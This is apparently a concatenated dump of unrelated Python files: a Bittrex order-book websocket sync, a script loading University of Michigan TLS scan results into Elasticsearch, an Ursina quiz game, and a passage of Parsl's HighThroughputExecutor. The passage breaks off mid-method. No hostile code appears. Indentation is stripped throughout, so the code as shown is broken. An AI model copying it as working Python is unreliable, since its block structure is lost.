def _get_static_snapshots(self):
order_queue = queue.Queue()
num_threads = min(len(self.tickers), 10)
order_books = {}
for ticker in self.tickers:
# Load the queue with api_tickers
order_queue.put(ticker)
# Pre-order order books
order_books[ticker] = \
{
'buy': None,
'sell': None,
'MarketName': ticker
}
def _retrieve(q, result):
while not q.empty():
work = q.get(False)
try:
api_url = 'https://bittrex.com/api/v1.1/public/getorderbook'
payload = {'market': work, 'type': 'both'}
data = get(api_url, payload).json()['result']
result[work] = \
{
'buy': data['buy'],
'sell': data['sell'],
'MarketName': work,
}
except Exception as e:
print(e)
break
q.task_done()
print('Retrieving order book snapshot...')
for j in list(range(num_threads)):
worker = Thread(target=_retrieve, args=(order_queue, order_books))
worker.setDaemon(True)
worker.start()
order_queue.join()
print('Order book snapshot retrieved.')
return order_books
def _confirm_orderbook(self):
def _get_queue(queue_object1):
try:
event = queue_object1.get(False)
except queue.Empty:
sleep(0.5)
else:
if event is not None and _confirm(event):
queue_object1.task_done()
def _confirm(event):
# Currently confirms only the BUY side.
side_matched = False
j = 0
ticker_del = -1
for order in event['Buys']:
if side_matched is False:
order_matched = False
for ticker in self.api_order_books:
if order_matched is False:
for k, order2 in enumerate(self.api_order_books[ticker]['buy']):
if order == order2:
j += 1
order_matched = True
if j == 5:
j = 0
side_matched = True
ticker_del = ticker
del self.api_order_books[ticker]['buy'][k]
break
else:
break
else:
del self.api_order_books[ticker_del]
event['MarketName'] = ticker_del
del event['Fills']
event['Buys'] = event['Buys'][0:self.book_depth]
event['Sells'] = event['Sells'][0:self.book_depth]
self.socket_order_books[ticker_del] = event
return True
# Wait until all the snapshot requests are received from the websocket
while self.orderbook_events.unfinished_tasks < len(self.tickers):
sleep(0.5)
else:
print('Order books\' name confirmation in progress...')
# Wait until the order book snapshots are identified and confirmed
while len(self.socket_order_books) < len(self.tickers):
_get_queue(self.orderbook_events)
else:
print('Order books\' name confirmed. Start syncing...')
def _sync(self):
while True:
# Wait for the order books to be confirmed.
if self.socket_order_books != {}:
while True:
try:
event = self.tick_queue.get()
except queue.Empty:
pass
else:
if event is not None:
self._sync_order_book(event)
self.tick_queue.task_done()
def _sync_order_book(self, order_data):
# Syncs the order book for the pair, given the most recent data from the socket
pair_name = order_data['MarketName']
nounce_diff = order_data['Nounce'] - self.socket_order_books[pair_name]['Nounce']
if nounce_diff == 1:
self.socket_order_books[pair_name]['Nounce'] = order_data['Nounce']
# Start syncing
for side in [['Buys', True], ['Sells', False]]:
made_change = False
for order in order_data[side[0]]:
# TYPE 0: New order entries at matching price
# -> ADD to order book
if order['Type'] == 0:
self.socket_order_books[pair_name][side[0]].append(
{
'Quantity': order['Quantity'],
'Rate': order['Rate']
})
made_change = True
# TYPE 1: Cancelled / filled order entries at matching price
# -> DELETE from the order book
elif order['Type'] == 1:
for i, existing_order in enumerate(
self.socket_order_books[pair_name][side[0]]):
if existing_order['Rate'] == order['Rate']:
del self.socket_order_books[pair_name][side[0]][i]
made_change = True
break
# TYPE 2: Changed order entries at matching price (partial fills, cancellations)
# -> EDIT the order book
elif order['Type'] == 2:
for existing_order in self.socket_order_books[pair_name][side[0]]:
if existing_order['Rate'] == order['Rate']:
existing_order['Quantity'] = order['Quantity']
made_change = True
break
if made_change:
# Sort by price, with respect to BUY(desc) or SELL(asc)
self.socket_order_books[pair_name][side[0]] = sorted(
self.socket_order_books[pair_name][side[0]],
key=lambda k: k['Rate'],
reverse=side[1])
# Put depth to 10
self.socket_order_books[pair_name][side[0]] = \
self.socket_order_books[pair_name][side[0]][
0:self.book_depth]
# Add nounce unix timestamp
self.socket_order_books[pair_name]['NounceStamp'] = time()
elif nounce_diff <= 0:
return
else:
raise NotImplementedError("Implement nounce resync!")
# Debug information, shows all data
def on_debug(self, **kwargs):
# Orderbook snapshot:
if 'R' in kwargs and type(kwargs['R']) is not bool:
self.orderbook_events.put(kwargs['R'])
def on_message(self, *args, **kwargs):
self.tick_queue.put(args[0])
if __name__ == "__main__":
tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
order_book = OrderBook(tickers, conn_type='cloudflare')
order_book.run()
# Do some sample work
# Wait until the order book snapshots are identified and confirmed
while len(order_book.socket_order_books) < len(order_book.tickers):
sleep(5)
else:
for ticker in order_book.socket_order_books.values():
name = ticker['MarketName']
quantity = str(ticker['Buys'][0]['Quantity'])
price = str(ticker['Buys'][0]['Rate'])
print('Ticker: ' + name + ', Bids depth 0: ' + quantity + '@' + price)
order_book.stop()
|
umich_daily.py
|
import argparse
import sys
from multiprocessing import cpu_count, Process, Queue
import json
import logging
from datetime import datetime
from elasticsearch import Elasticsearch
from elasticsearch.helpers import bulk, scan
import hashlib
from helpers.certparser import process_cert
from helpers.hostparser import proccess_host
logger = logging.getLogger('SSLImporter')
logger_format = logging.Formatter('\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():%(lineno)d %(asctime)s\033[0m| '
'%(message)s')
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(logger_format)
logger.addHandler(stream_handler)
elastic_logger = logging.getLogger('elasticsearch')
elastic_logger.addHandler(stream_handler)
DEFAULT_SERVER = u'localhost'
DEFAULT_PORT = 9200
def process_scan_certs(q, es):
"""
:param q: The Queue object that certs should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
:return:
"""
bulk_certs = []
while True:
certs = q.get()
if certs == "DONE":
bulk(es, bulk_certs)
return True
for cert in certs['certs']:
newcert = process_cert(cert)
if newcert:
newcert['import_date'] = certs['time']
newcert['source'] = 'umich'
newcert_action = {"_index": "passive-ssl-certs-umich", "_type": "cert", '_id': newcert['hash_id'],
'_source': newcert}
bulk_certs.append(newcert_action)
if len(bulk_certs) == 500:
bulk(es, bulk_certs)
bulk_certs = []
def process_hosts(q, es, initial):
"""
:param q: The Queue object that hosts should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
    :param initial: If this is the initial upload then we set first_seen = last_seen. Otherwise first_seen is left
blank and will be cleaned up later
:return:
"""
bulk_hosts = []
while True:
line = q.get()
if line == "DONE":
bulk(es, bulk_hosts)
return True
host = proccess_host(line)
cert_hash = hashlib.sha1(host['host']+host['hash']+host['source'])
cert_hash = cert_hash.hexdigest()
if initial:
host['first_seen'] = host['last_seen']
action = {"_op_type": "update", "_index": 'passive-ssl-hosts-umich', "_type": "host", "_id": cert_hash,
"doc": line, "doc_as_upsert": "true"}
bulk_hosts.append(action)
if len(bulk_hosts) == 500:
bulk(es, bulk_hosts)
bulk_hosts = []
def parse_scanfile(f, host_queue, cert_queue):
"""
:param f: json file from University of Michigan that has been lz4 decompressed.
:param host_queue: Queue to send host info to
:param cert_queue: Queue to send cert info to
:return:
"""
certs_set = set()
with open(f) as scan_file:
for line in scan_file:
item = json.loads(line)
item['log'].pop(0)
for entry in item['log']:
if entry['data']:
if 'server_certificates' in entry['data'] and entry['data']['server_certificates'] is not None:
if entry['data']['server_certificates']['certificate'] is not None:
if 'fingerprint_sha1' in entry['data']['server_certificates']['certificate']:
server_cert = entry['data']['server_certificates']['certificate']['fingerprint_sha1']
doc = {'host': item['host'], 'source': 'umich', 'last_seen': item['time'],
'hash': server_cert}
host_queue.put(doc)
if server_cert in certs_set:
pass # We already have this sha1 and we don't need to attempt parsing it
else:
if entry['data']['server_certificates']['certificate'] is not None:
if 'raw' in entry['data']['server_certificates']:
raw_cert = dict()
raw_cert['time'] = item['time']
raw_cert['certs'] = entry['data']['server_certificates']['raw']
else:
raw_cert = None
if raw_cert:
cert_queue.put(raw_cert)
certs_set.add(server_cert) # We have added this hash to be processed so we
# don't need to process it again
print "Finished processing file....now printing the length of the certs set"
print len(certs_set)
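# Editor's note (illustrative, inferred from the parsing above): each line of the decompressed
# scan file is a JSON object shaped roughly like
#
#     {"host": "192.0.2.10", "time": "2015-06-01T00:00:00Z",
#      "log": [..., {"data": {"server_certificates": {
#          "certificate": {"fingerprint_sha1": "ab12..."}, "raw": ["MII..."]}}}]}
#
# Host/hash documents go onto host_queue, raw cert chains onto cert_queue, and certs_set keeps
# already-seen SHA1s from being parsed twice. The field values above are made up.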
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--server', default=DEFAULT_SERVER,
help=u'Elasticsearch hostname or IP (default {0})'.format(DEFAULT_SERVER))
parser.add_argument('--port', default=DEFAULT_PORT,
help=u'Elasticsearch port (default {0})'.format(DEFAULT_PORT))
parser.add_argument('--scanfile', help=u'Path to umich scan file you are ingesting. '
u'Please make sure to decompress it')
parser.add_argument('--initial', help=u'If this is the first file you are importing please use this flag',
action='store_true')
args = parser.parse_args(argv[1:])
if args.scanfile is None:
logger.error("Please include a scanfile")
sys.exit(1)
workers = cpu_count()
process_hosts_queue = Queue(maxsize=20000)
process_certs_queue = Queue(maxsize=20000)
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_hosts, args=(process_hosts_queue, es, args.initial))
p.daemon = True
p.start()
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_scan_certs, args=(process_certs_queue, es))
p.daemon = True
p.start()
logger.warning("Starting processing of {file} at {date}".format(file=args.scanfile, date=datetime.now()))
    # This is the bottleneck of the process but it works for now
parse_scanfile(args.scanfile, process_hosts_queue, process_certs_queue)
# Once all the json lines have been put onto the queue. Add DONE so the queue workers know when to quit.
for w in xrange(workers):
process_hosts_queue.put("DONE")
process_certs_queue.put("DONE")
# Close out the queue we are done
process_hosts_queue.close()
process_hosts_queue.join_thread()
process_certs_queue.close()
process_certs_queue.join_thread()
# this is kinda dirty but without looking up everything at insert time (slow) I don't know of a better way to do
# this based on the number of documents we will have
refresh_es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
# construct an elasticsearch query where the filter is looking for any entry that is missing the field first_seen
q = {'size': 500, "query": {"match_all": {}}, "filter": {"missing": {"field": "first_seen"}}}
new_updates = refresh_es.search(index='passive-ssl-hosts-umich', body=q)
logger.warning("Numer of hosts to update is {count}".format(count=new_updates['hits']['total']))
# Scan across all the documents missing the first_seen field and bulk update them
missing_first_seen = scan(refresh_es, query=q, scroll='30m', index='passive-ssl-hosts-umich')
bulk_miss = []
for miss in missing_first_seen:
last_seen = miss['_source']['last_seen']
first_seen = last_seen
action = {"_op_type": "update", "_index": "passive-ssl-hosts-umich", "_type": "host", "_id": miss['_id'],
"doc": {'first_seen': first_seen}}
bulk_miss.append(action)
if len(bulk_miss) == 500:
bulk(refresh_es, bulk_miss)
bulk_miss = []
    # Get the remaining ones (fewer than 500) now that the loop has ended
bulk(refresh_es, bulk_miss)
logger.warning("{file} import finished at {date}".format(file=args.scanfile, date=datetime.now()))
    # Now we should optimize each index to max num segments of 1 to help with searching/sizing and just
    # overall ES happiness
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-hosts-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-hosts-umich', max_num_segments=1, request_timeout=7500)
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-certs-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-certs-umich', max_num_segments=1, request_timeout=7500)
if __name__ == "__main__":
main(sys.argv)
|
castle.py
|
from ursina import *
from .questionbtn import QuestionBtn, padding
from .question import Question
from .stone import Stone
from .brick import Brick
from .floor import Floor
from .door import Door
from .congrats import Congrats
from .initbtn import InitButton
from ..config import Z_LIMITS
from ..config import X_LIMITS
from ..config import LEVELS_SIZE
from ..config import CASTLE_WIDTH
from ..textures import textures
import threading
import time
import random
well_done_sound = Audio('assets/sounds/Well_Done_1.mp3', loop=False, autoplay=False)
class Castle():
WIDTH = CASTLE_WIDTH
DEPTH = 4
current_player_level = 0
def __init__(self,levels = [1,2,3,4,5,6]):
self.levels = levels
self.HEIGHT = len(levels) * LEVELS_SIZE +1
for z in range(self.DEPTH * -1,self.DEPTH +1 ):
for x in range(self.WIDTH * -1 ,self.WIDTH + 1):
for y in range(1,self.HEIGHT + self.HEIGHT*2):
is_delimited_region = (abs(z) == self.DEPTH or abs(x) == self.WIDTH)
is_the_door = (y<= 3 and x>=0 and x<=1 and z == self.DEPTH * -1)
if is_delimited_region and not is_the_door:
if y > LEVELS_SIZE and ((y+1) % (LEVELS_SIZE/2) == 0 ) :
Entity(model = "quad", texture=textures["window"], position = (x,y-.2,z))
else:
stone = Stone(position=(x,y,z))
if x==1 and y==1 and z==self.DEPTH * -1:
door = Door(position=(.5,y,z),size = 2)
if y% LEVELS_SIZE == 0:
stone = Stone(position=(x,y,z))
l = 1
for level in levels:
self.generate_level(level,l)
l+=1
self.generate_entrance()
self.generate_start_game()
self.generate_congrats()
def upgrade_level(self,delay=1.7):
from .. import player
self.current_player_level +=1
def move_player(delay):
time.sleep(delay)
player.set_position([0,player.y+LEVELS_SIZE,0])
thread = threading.Thread(target=move_player,args=(delay,))
thread.start()
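    # Editor's note (explanatory comment added by the editor, not original project documentation):
    # the helper thread above delays the player's teleport to the next level (default 1.7 s)
    # without blocking Ursina's main update loop; calling time.sleep() on the main thread would
    # freeze rendering.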
def generate_congrats(self):
c = Congrats(len(self.levels))
def generate_level(self,level,l):
a = 1
delta = (LEVELS_SIZE -1) / len(level["answers"])
delta_y = l * LEVELS_SIZE # - delta
if level["question"]["type"] == "Image":
question = Question(img=level["question"]["value"], position=Vec3(
(CASTLE_WIDTH)-7, (LEVELS_SIZE)*l+(LEVELS_SIZE/2), self.DEPTH-.6))
else:
question = Question(text=level["question"]["value"], position=Vec3(
(CASTLE_WIDTH)-7, (LEVELS_SIZE)*l+(LEVELS_SIZE/2), self.DEPTH-.6))
randomized_answers = level["answers"].copy()
random.shuffle(randomized_answers)
for answer in randomized_answers:
if answer["type"] == "Image":
qb = QuestionBtn(
lambda x: self.upgrade_level() if x else None,
img=answer["value"],
position=Vec3((CASTLE_WIDTH-1) / 2, (LEVELS_SIZE-1) + delta_y, self.DEPTH-.6), is_answer=answer.get("answer", False))
#position = Vec3(0,5,0),is_answer=True)
else:
print(answer)
qb = QuestionBtn(
lambda x: self.upgrade_level() if x else None,
text=answer["value"],
position=Vec3((CASTLE_WIDTH-1) / 2, (LEVELS_SIZE-1) + delta_y, self.DEPTH-.6), is_answer=answer.get("answer", False))
#position = Vec3(0,5,0),is_answer=True)
delta_y = delta_y - delta
a+=1
def generate_start_game(self):
btn = InitButton(self.upgrade_level)
def generate_entrance(self):
for z in range(Z_LIMITS[0],Z_LIMITS[1]+1):
for x in range(X_LIMITS[0],X_LIMITS[1]+1):
                # if it's in front of the castle
                # and it's in the center of the castle
if z < self.DEPTH * -1 and z > Z_LIMITS[0]*.8 \
and x>=X_LIMITS[0]*.05 and x<=X_LIMITS[1]*.05:
pass
#destroy(voxel)
voxel = Floor(position=(x,0,z))
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import pickle
from multiprocessing import Process, Queue
from typing import Dict, List, Optional, Tuple, Union
import math
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import BadMessage, ScalingFailed, DeserializationError
from parsl.executors.base import ParslExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
class HighThroughputExecutor(ParslExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
    2. The Interchange, which acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environment variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
and is an integer in the range from 0 to the number of workers in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.jetstream.jetstream.Jetstream`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period, heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by `hostname` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
there is sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched by the manager. Default: infinity
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
suppress_failure : Bool
If set, the interchange will suppress failures rather than terminate early. Default: True
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be unavailable. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components, in milliseconds. Increasing the poll_period
trades performance for CPU efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
suppress_failure: bool = True,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.blocks = {} # type: Dict[str, str]
self.tasks = {} # type: Dict[str, Future]
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self.workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self.workers_per_node == float('inf'):
self.workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.suppress_failure = suppress_failure
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"--hb_threshold={heartbeat_threshold} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._executor_bad_state = threading.Event()
self._executor_exception = None
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
self.initialize_scaling()
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self._executor_bad_state.is_set():
try:
msgs = self.incoming_q.get(timeout=1)
# logger.debug("[MTHREAD] get has returned {}".format(len(msgs)))
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
self._executor_exception, _ = deserialize_object(msg['exception'])
logger.exception("Exception: {}".format(self._executor_exception))
# Set bad state to prevent new tasks from being submitted
self._executor_bad_state.set()
# We set all current tasks to this exception to make sure that
# this is raised in the main context.
for task in self.tasks:
self.tasks[task].set_exception(self._executor_exception)
break
task_fut = self.tasks[tid]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s, _ = deserialize_object(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"suppress_failure": self.suppress_failure,
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
# logger.debug("Got outstanding count: {}".format(outstanding_c))
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if self._executor_bad_state.is_set():
raise self._executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
external_block_id = str(len(self.blocks))
launch_cmd = self.launch_cmd.format(block_id=external_block_id)
